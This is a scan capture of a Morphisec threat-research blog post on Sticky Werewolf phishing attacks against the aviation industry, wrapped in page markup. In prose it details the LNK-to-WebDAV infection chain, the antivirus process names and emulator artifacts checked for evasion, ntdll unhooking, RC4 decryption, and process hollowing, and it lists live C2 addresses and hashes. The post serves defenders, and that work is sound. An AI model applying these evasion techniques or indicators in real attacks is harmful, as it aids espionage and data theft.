blog.morphisec.com
Open in
urlscan Pro
199.60.103.31
Public Scan
URL:
https://blog.morphisec.com/sticky-werewolfs-aviation-attacks
Submission: On June 10 via api from IN — Scanned from DE
Submission: On June 10 via api from IN — Scanned from DE
Form analysis 4 forms found in the DOM
/hs-search-results
<form action="/hs-search-results" data-cb-wrapper="true" data-hs-cf-bound="true">
<input type="text" class="hs-search-field__input form-control" name="term" placeholder="Search" autocomplete="off" aria-label="Search">
</form>/hs-search-results
<form action="/hs-search-results" data-cb-wrapper="true" data-hs-cf-bound="true">
<input type="text" class="hs-search-field__input form-control" name="term" placeholder="Search" autocomplete="off" aria-label="Search">
</form>POST https://forms.hsforms.com/submissions/v3/public/submit/formsnext/multipart/1534169/37b11fda-a2aa-4805-9c0e-bae8eaccd6b7
<form id="hsForm_37b11fda-a2aa-4805-9c0e-bae8eaccd6b7_6317" method="POST" accept-charset="UTF-8" enctype="multipart/form-data" novalidate=""
action="https://forms.hsforms.com/submissions/v3/public/submit/formsnext/multipart/1534169/37b11fda-a2aa-4805-9c0e-bae8eaccd6b7"
class="hs-form-private hsForm_37b11fda-a2aa-4805-9c0e-bae8eaccd6b7 hs-form-37b11fda-a2aa-4805-9c0e-bae8eaccd6b7 hs-form-37b11fda-a2aa-4805-9c0e-bae8eaccd6b7_0f46e8ea-b4fe-46e5-a9bc-db49fc107d4c hs-form stacked hs-custom-form"
target="target_iframe_37b11fda-a2aa-4805-9c0e-bae8eaccd6b7_6317" data-instance-id="0f46e8ea-b4fe-46e5-a9bc-db49fc107d4c" data-form-id="37b11fda-a2aa-4805-9c0e-bae8eaccd6b7" data-portal-id="1534169"
data-test-id="hsForm_37b11fda-a2aa-4805-9c0e-bae8eaccd6b7_6317" data-hs-cf-bound="true">
<div class="hs_firstname hs-firstname hs-fieldtype-text field hs-form-field smart-field"><label id="label-firstname-37b11fda-a2aa-4805-9c0e-bae8eaccd6b7_6317" class="" placeholder="Enter your "
for="firstname-37b11fda-a2aa-4805-9c0e-bae8eaccd6b7_6317"><span></span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input id="firstname-37b11fda-a2aa-4805-9c0e-bae8eaccd6b7_6317" name="firstname" required="" placeholder="First Name*" type="text" class="hs-input" inputmode="text" autocomplete="given-name" value=""></div>
</div>
<div class="hs_lastname hs-lastname hs-fieldtype-text field hs-form-field smart-field"><label id="label-lastname-37b11fda-a2aa-4805-9c0e-bae8eaccd6b7_6317" class="" placeholder="Enter your "
for="lastname-37b11fda-a2aa-4805-9c0e-bae8eaccd6b7_6317"><span></span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input id="lastname-37b11fda-a2aa-4805-9c0e-bae8eaccd6b7_6317" name="lastname" required="" placeholder="Last Name*" type="text" class="hs-input" inputmode="text" autocomplete="family-name" value=""></div>
</div>
<div class="hs_email hs-email hs-fieldtype-text field hs-form-field"><label id="label-email-37b11fda-a2aa-4805-9c0e-bae8eaccd6b7_6317" class="" placeholder="Enter your " for="email-37b11fda-a2aa-4805-9c0e-bae8eaccd6b7_6317"><span></span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input id="email-37b11fda-a2aa-4805-9c0e-bae8eaccd6b7_6317" name="email" required="" placeholder="Email*" type="email" class="hs-input" inputmode="email" autocomplete="email" value=""></div>
</div>
<div class="hs_company hs-company hs-fieldtype-text field hs-form-field smart-field"><label id="label-company-37b11fda-a2aa-4805-9c0e-bae8eaccd6b7_6317" class="" placeholder="Enter your "
for="company-37b11fda-a2aa-4805-9c0e-bae8eaccd6b7_6317"><span></span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input id="company-37b11fda-a2aa-4805-9c0e-bae8eaccd6b7_6317" name="company" required="" placeholder="Company*" type="text" class="hs-input" inputmode="text" autocomplete="organization" value=""></div>
</div>
<div class="hs_submit hs-submit">
<div class="hs-field-desc" style="display: none;"></div>
<div class="actions"><input type="submit" class="hs-button primary large" value="Subscribe"></div>
</div><input name="hs_context" type="hidden"
value="{"embedAtTimestamp":"1718017665662","formDefinitionUpdatedAt":"1717804404908","lang":"en","isLegacyThemeAllowed":"true","userAgent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36","pageTitle":"Howling at the Inbox: Sticky Werewolf's Latest Malicious Aviation Attacks","pageUrl":"https://blog.morphisec.com/sticky-werewolfs-aviation-attacks","pageId":"169577076135","isHubSpotCmsGeneratedPage":true,"canonicalUrl":"https://blog.morphisec.com/sticky-werewolfs-aviation-attacks","contentType":"blog-post","hutk":"cc11b8c52b1dcd68db59ddb4fd9e0b46","__hsfp":1608735010,"__hssc":"182053752.1.1718017666673","__hstc":"182053752.cc11b8c52b1dcd68db59ddb4fd9e0b46.1718017666673.1718017666673.1718017666673.1","formTarget":"#hs_form_target_module_1541132004988163","formInstanceId":"6317","rawInlineMessage":"Thanks for submitting the form.","hsFormKey":"ea940ed479acfe677625b30c3ac37438","pageName":"Howling at the Inbox: Sticky Werewolf's Latest Malicious Aviation Attacks","rumScriptExecuteTime":711.5,"rumTotalRequestTime":969.8999996185303,"rumTotalRenderTime":1033.3000011444092,"rumServiceResponseTime":258.3999996185303,"rumFormRenderTime":63.400001525878906,"connectionType":"4g","firstContentfulPaint":0,"largestContentfulPaint":0,"locale":"en","timestamp":1718017666687,"originalEmbedContext":{"portalId":"1534169","formId":"37b11fda-a2aa-4805-9c0e-bae8eaccd6b7","region":"na1","target":"#hs_form_target_module_1541132004988163","isBuilder":false,"isTestPage":false,"isPreview":false,"formInstanceId":"6317","formsBaseUrl":"/_hcms/forms","css":"","inlineMessage":"Thanks for submitting the form.","isMobileResponsive":true,"rawInlineMessage":"Thanks for submitting the form.","hsFormKey":"ea940ed479acfe677625b30c3ac37438","pageName":"Howling at the Inbox: Sticky Werewolf's Latest Malicious Aviation Attacks","pageId":"169577076135","contentType":"blog-post","formData":{"cssClass":"hs-form stacked hs-custom-form"},"isCMSModuleEmbed":true},"correlationId":"0f46e8ea-b4fe-46e5-a9bc-db49fc107d4c","renderedFieldsIds":["firstname","lastname","email","company"],"captchaStatus":"NOT_APPLICABLE","emailResubscribeStatus":"NOT_APPLICABLE","isInsideCrossOriginFrame":false,"source":"forms-embed-1.5387","sourceName":"forms-embed","sourceVersion":"1.5387","sourceVersionMajor":"1","sourceVersionMinor":"5387","allPageIds":{"embedContextPageId":"169577076135","analyticsPageId":"169577076135","contentPageId":169577076135,"contentAnalyticsPageId":"169577076135"},"_debug_embedLogLines":[{"clientTimestamp":1718017665769,"level":"INFO","message":"Retrieved customer callbacks used on embed context: [\"getExtraMetaDataBeforeSubmit\"]"},{"clientTimestamp":1718017665770,"level":"INFO","message":"Retrieved pageContext values which may be overriden by the embed context: {\"pageTitle\":\"Howling at the Inbox: Sticky Werewolf's Latest Malicious Aviation Attacks\",\"pageUrl\":\"https://blog.morphisec.com/sticky-werewolfs-aviation-attacks\",\"userAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36\",\"pageId\":\"169577076135\",\"contentAnalyticsPageId\":\"169577076135\",\"contentPageId\":169577076135,\"isHubSpotCmsGeneratedPage\":true}"},{"clientTimestamp":1718017665771,"level":"INFO","message":"Retrieved countryCode property from normalized embed definition response: \"DE\""},{"clientTimestamp":1718017666683,"level":"INFO","message":"Retrieved analytics values from API response which may be overriden by the embed context: {\"hutk\":\"cc11b8c52b1dcd68db59ddb4fd9e0b46\",\"canonicalUrl\":\"https://blog.morphisec.com/sticky-werewolfs-aviation-attacks\",\"contentType\":\"blog-post\",\"pageId\":\"169577076135\"}"}]}"><iframe
name="target_iframe_37b11fda-a2aa-4805-9c0e-bae8eaccd6b7_6317" style="display: none;"></iframe>
</form>/hs-search-results
<form data-hs-do-not-collect="true" action="/hs-search-results" data-cb-wrapper="true">
<input type="text" class="hs-search-field__input" name="term" autocomplete="off" aria-label="Search" placeholder="Keyword...">
<input type="hidden" name="type" value="SITE_PAGE">
<input type="hidden" name="type" value="BLOG_POST">
<input type="hidden" name="type" value="LISTING_PAGE">
</form>Text Content
Cybersecurity Tech Investment Planning: Use annual loss expectancy to build a
business case
Download now
* Support
* Partners
* Under Attack?
* Products
* Product Overview
* Adaptive Exposure Management
* Morphisec for Windows Endpoints
* Morphisec for Windows Servers & Workloads
* Morphisec for Linux Server Protection
* Incident Response Services
* About Moving Target Defense
* Solutions
* By Industry
* Finance
* Hedge Funds
* Healthcare
* Technology
* Manufacturing
* Legal
* K-12 Education
* SMB
* By Use Case
* Microsoft Defender AV
* Microsoft Defender for Endpoint
* Virtual Desktop Protection
* Cloud Workload Protection
* Remote Employee Security
* Ransomware Prevention
* Virtual Patching and Compliance
* Supply Chain Attack Protection
* Browser Attack Protection
* Company
* About Us
* News & Events
* Careers
* Contact Us
* Resources
* Blog
* Learning Center
* Customer Stories
Read the Blog
Get A Demo
* Products
* Main Menu
* Products
* Product Overview
* Adaptive Exposure Management
* Morphisec for Windows Endpoints
* Morphisec for Windows Servers & Workloads
* Morphisec for Linux Server Protection
* Incident Response Services
* About Moving Target Defense
* Solutions
* Main Menu
* Solutions
* By Industry
* Finance
* Hedge Funds
* Healthcare
* Technology
* Manufacturing
* Legal
* K-12 Education
* SMB
* By Use Case
* Microsoft Defender AV
* Microsoft Defender for Endpoint
* Virtual Desktop Protection
* Cloud Workload Protection
* Remote Employee Security
* Ransomware Prevention
* Virtual Patching and Compliance
* Supply Chain Attack Protection
* Browser Attack Protection
* Company
* Main Menu
* Company
* About Us
* News & Events
* Careers
* Contact Us
* Resources
* Main Menu
* Resources
* Learning Center
* Customer Stories
* Blog
* Support
* Partners
* Under Attack?
* Read the Blog
* Get A Demo
Cybersecurity Blog
Cybersecurity News, Threat Research, and more from the Team Spearheading the
Evolution of Endpoint Security
HOWLING AT THE INBOX: STICKY WEREWOLF'S LATEST MALICIOUS AVIATION ATTACKS
Posted by Arnold Osipov on June 6, 2024
Find me on:
LinkedIn Twitter
*
* Share
*
Morphisec Labs has been monitoring increased activity associated with Sticky
Werewolf, a group suspected to have geopolitical and/or hacktivist ties. While
the group’s geographical origin and home base remain unclear, recent attack
techniques suggest espionage and data exfiltration intent.
INTRODUCTION
Sticky Werewolf is a cyber threat group first detected in April 2023; early
activities primarily targeted public organizations in Russia and Belarus. The
group’s operations have since extended to several sectors, targeting a
pharmaceutical company, a Russian research institute dealing with microbiology
and vaccine development, and more.
In their most recent campaign, Sticky Werewolf have targeted the aviation
industry with emails supposedly from the First Deputy General Director of AO OKB
Kristall (a Moscow-based company involved in the production and maintenance of
aircraft and spacecraft). In previous campaigns the group used phishing emails
with links to malicious files. This latest campaign used archive files
containing LNK files pointing to a payload stored on WebDAV servers.
INFECTION CHAIN
In previous campaigns, the infection chain began with phishing emails containing
a link to download a malicious file from platforms like gofile.io. However, in
their latest campaign, the infection method has changed.
The initial email includes an archive attachment; when the recipient extracts
the archive, they find LNK and decoy files. These LNK files point to an
executable hosted on a WebDAV server. Once executed, this initiates a Batch
script, which then launches an AutoIt script that ultimately injects the final
payload.
TECHNICAL ANALYSIS
PHISHING EMAIL
The phishing email, purportedly sent by the First Deputy General Director and
Executive Director of AO OKB Kristall, targets individuals in the aerospace and
defense sector.
The email invites recipients to a video conference on future cooperation,
providing a password-protected archive that containing a malicious payload, and
aims to deceive recipients into opening the harmful attachment under the lure of
a legitimate business invitation.
EMAIL ATTACHMENT
The initial archive delivered in the phishing email contains three files
designed to deceive the recipient into executing at least one of the malicious
email’s contents.
The archive includes:
* A Decoy PDF File: This file serves as a distraction, providing seemingly
legitimate content to reduce suspicion while the LNK files execute the
malicious payload.
* Two LNK Files Masquerading as DOCX Documents:
* Повестка совещания.docx.lnk (Meeting agenda): This file is intended to
appear as a legitimate document outlining the meeting agenda.
* Список рассылки.docx.lnk (Mailing list): This file is disguised as a
document containing the distribution list for the meeting.
PDF
The PDF file, included as a decoy in the phishing archive, is an invitation to a
video conference organized by AO "OKB Kristall" with key enterprises of the
"Russian Helicopters" holding. The conference aims to discuss "Issues of
prospective cooperation 2024-2025."
The PDF also references the two malicious LNK files as attachments, increasing
the likelihood of the recipient opening them.
* Meeting agenda (Повестка совещания.docx.lnk)
* Mailing list (Список рассылки.docx.lnk)
LNKS
Once the victim clicks the LNK files, the following actions will be triggered:
FIRST LNK - ПОВЕСТКА СОВЕЩАНИЯ.DOCX.LNK (MEETING AGENDA)
Executes the command which performs multiple actions:
1. Registry Entry for Persistence: Adds a registry entry to run WINWORD.exe from
a network share (\\94.156.8[.]166\Microsoft Office Word$\WINWORD.exe) on login.
2. Decoy Message: Displays a message in Russian indicating a document opening
error, claiming the file is corrupted.
3. Copies image.jpg from another network share (\\79.132.128[.]47\image.jpg) to
the local root directory. The file was unavailable at the time of research and
is suspected to be used as a decoy.
SECOND LNK - СПИСОК РАССЫЛКИ.DOCX.LNK (MAILING LIST)
Executes the command \\document-cdn[.]org\Microsoft Office Word$\WINWORD.exe,
which will launch the same executable as in the first LNK file, this time with
the domain name resolved by the above IP (at the time of writing).
CYPHERIT LOADER / CRYPTER
Once the victim clicks the LNK file, the executable from the network share
begins running. This executable is an NSIS self-extracting archive which is part
of a previously known crypter named CypherIT.
This crypter has been used for several years to deliver malicious payloads in
various campaigns by multiple threat actors. While the original CypherIT crypter
is no longer being sold, the current executable is a variant of it, as observed
in couple of hacking forums.
The NSIS archive extracts its files into the $INTERNET_CACHE directory, which
corresponds to %LocalAppData%\Microsoft\Windows\INetCache, and is typically used
for Internet Explorer's temporary files. After extraction, the installer runs
one of the files, an obfuscated batch script.
BATCH SCRIPT
This batch script performs several operations:
* Delay Execution: If wrsa.exe or opssvc.exe processes are running, the script
delays execution by running ping -n 193 127.0.0.1.
* Change Filenames: If any of the following processes are present: avastui.exe,
avgui.exe, nswscsvc.exe, sophoshealth.exe, the script changes the filenames
for the next stage AutoIt executable and script file extension.
* File Concatenation: Concatenates multiple files into two files:
* A legitimate AutoIt executable.
* A compiled AutoIt script.
* Execute AutoIt: Runs the AutoIt executable, passing the compiled script as an
argument.
Process Name
Vendor
avastui.exe
AVG Antivirus
avgui.exe
AVG Antivirus
nswscsvc.exe
Norton Security
opssvc.exe | sophoshealth.exe
Sophos Endpoint Protection
wrsa.exe
Webroot
Table: Processes monitored by the Batch script and their corresponding security
vendors.
AUTOIT SCRIPT
The executed AutoIT script has various capabilities such as anti-analysis,
anti-emulation, persistence, and unhooking. Its main goal is to inject the
payload and establish persistence while evading security solutions and analysis
attempts.
ANTI-ANALYSIS AND ANTI-EMULATION
The script checks for artifacts or signs belonging to security vendors'
emulators and environments:
Artifact-Type
Value
Vendor
Computer Name
tz
BitDefender Emulator
Computer Name
NfZtFbPfH
Kaspersky Emulator
Computer Name
ELICZ
AVG Emulator
Username
test22
Process name
avastui.exe
AVG Antivirus
File Name
C:\aaa_TouchMeNot_.txt
Windows Defender Emulator
Process Name
bdagent.exe
Bitdefender
Process Name
avp.exe
Kaspersky
The script then overrides ntdll.dll by mapping a clean copy from the disk and
replacing the .text section of the one loaded — a known technique to remove
hooking.
PERSISTENCE
Persistence is established via a scheduled task or the startup directory.
DECRYPTION AND INJECTION
Before injecting the payload, it decrypts it using two shellcodes that perform
RC4 decryption.
1. The first shellcode performs the key scheduling algorithm using the provided
passphrase.
2. The second shellcode implements the PRGA of the RC4 stream cipher.
The decrypted bytes are decompressed using RtlDecompressFragment with
COMPRESSION_FORMAT_LZNT1. The final payload is then injected using a process
hollowing into a legitimate AutoIT process.
CONCLUSION
The injected payloads typically include commodity RATs or stealers. Recently,
Sticky Werewolf has utilized Rhadamanthys Stealer and Ozone RAT in their
campaigns. Previously, the group deployed MetaStealer, DarkTrack, NetWire, among
others. These malwares facilitate extensive espionage and data exfiltration.
While there is no definitive evidence pointing to a specific national origin for
the Sticky Werewolf group, the geopolitical context suggests possible links to a
pro-Ukrainian cyberespionage group or hacktivists, but this attribution remains
uncertain.
HOW MORPHISEC HELPS
Morphisec's Automated Moving Target Defense (AMTD) effectively stops attacks,
which typically include commodity RATs or stealers, (like those used by the
Sticky Werewolf group) at various stages of the attack chain.
Morphisec doesn’t rely on signature or behavioral patterns. Instead, it uses its
patented AMTD technology to prevent the attack at its earliest stages,
preemptively blocking attacks on memory and applications, and effectively
remediating the need for response.
Schedule a demo today to see how Morphisec stops Sticky Werewolf and other new
emerging threats.
IOCS
EXE
* 05880ff0442bbedc8f46076ef56d4d1ffeda68d9ef26b659c4868873fa84c1a9
* 03ee2011ad671b1781015024ea53edfbff92c28c2b123bba02d6a6f462e74105
* 1301ec3006ad03742bfaef047aa434320aa0e725a99be5d6be27b955a814fcf4
LNK
* c3efbac8ebffcf3d8178ce23e59f3b4978f5a91bf93773889870d45cc1b554b0
* ce2b6d3aad07d3dec2b24f676cc9d2022bab5a086c7e773f9cfa3e7b7dc6d66a
DECOY
* 9eddffbef4d9d7329d062db0a93c933104d00f12106bf91fa3b58e8f8b19aa41
* 217196571088cfd63105ae836482d742befcb7db37308ce757162c005a5af6ab
* 3ccbd8bd7424506b26491e5ff5ff55b000adaab1074ccf3b7452d0883f668040
* d6e6c786b793b46a1ee9b18b058e045d0aa1c83aa2b6aa493637f611d654d957
* d973e7854f10b4d0a1060e55022dceadc51d038cee85d05e2c2c2fd3b40a42be
C2
* 79.132.128[.]47
* 94.156.8[.]166
* document-cdn[.]org
* 94.156.8[.]211
SUBSCRIBE TO OUR BLOG
Stay in the loop with industry insight, cyber security trends, and cyber attack
information and company updates.
SEARCH OUR SITE
RECENT POSTS
* Howling at the Inbox: Sticky Werewolf's Latest Malicious Aviation Attacks
* Adaptive Cyber Resiliency Best Practices
* Evolving Cyber Resiliency: How Adaptive Exposure Management Strengthens CTEM
Programs
* Threat Bulletin – New variant of IDAT Loader
* Introducing the Anti-Ransomware Assurance Suite: A Multi-Layered Guard
Against Ransomware
* History of Ransomware: The Evolution of Attacks and Defense Mechanisms
* Preventing Ransomware and Advanced Endpoint Threats with Morphisec +
Microsoft Defender for Endpoint
* Threat Bulletin – CVE-2024-2883
* Breaking Boundaries: Mispadu's Infiltration Beyond LATAM
* The National Vulnerability Database Crisis: Defend Against Unpatched
Vulnerabilities
POSTS BY TAG
* Moving Target Defense (129)
* Cyber Security News (124)
* Morphisec Labs (114)
* Threat Research (66)
* Threat Post (63)
* Morphisec News (52)
* Automated Moving Target Defense (11)
* Defense-in-Depth (6)
* in-memory attacks (6)
* Gartner (5)
* Ransomware (4)
* runtime attacks (4)
* Legacy security (3)
* Linux cyber security (3)
* advanced threat defense (3)
* threat and vulnerability management (3)
* Adaptive Exposure Management (2)
* ChatGPT (2)
* Evasive loader (2)
* Fileless malware (2)
* Gartner endpoint protection (2)
* financial cybersecurity (2)
* patch management (2)
* Anti-tampering (1)
* Critical Threat Exposure Management (CTEM) (1)
* Gartner Emerging Tech (1)
* Healthcare cybersecurity (1)
* IoT security (1)
* Securing IoT devices (1)
* Server security (1)
See all
* Products
* Product Overview
* Morphisec for Windows Endpoints
* Morphisec for Windows Servers & Workloads
* Morphisec for Linux Server Protection
* Morphisec Vulnerability Visibility & Prioritization
* Incident Response Services
* About Moving Target Defense
* Solutions By Industry
* Banking & Finance
* Hedge Funds
* Healthcare
* Technology
* Manufacturing
* Legal
* K-12 Education
* SMB
* Solutions by Use Case
* Microsoft Defender for Endpoint
* Microsoft Defender AV
* Virtual Desktop Protection
* Ransomware Protection
* Supply Chain Attack Protection
* Cloud Workload Protection
* Remote Employee Security
* Virtual Patching & Compliance
* Browser Attack Protection
* Company
* About Us
* News & Events
* Careers
* Blog
* Support
* Partners
* Contact Us
* Privacy & Legal
* Contact Sales
* Inquire via Azure
*
*
*
© 2023 Morphisec Ltd. | All rights reserved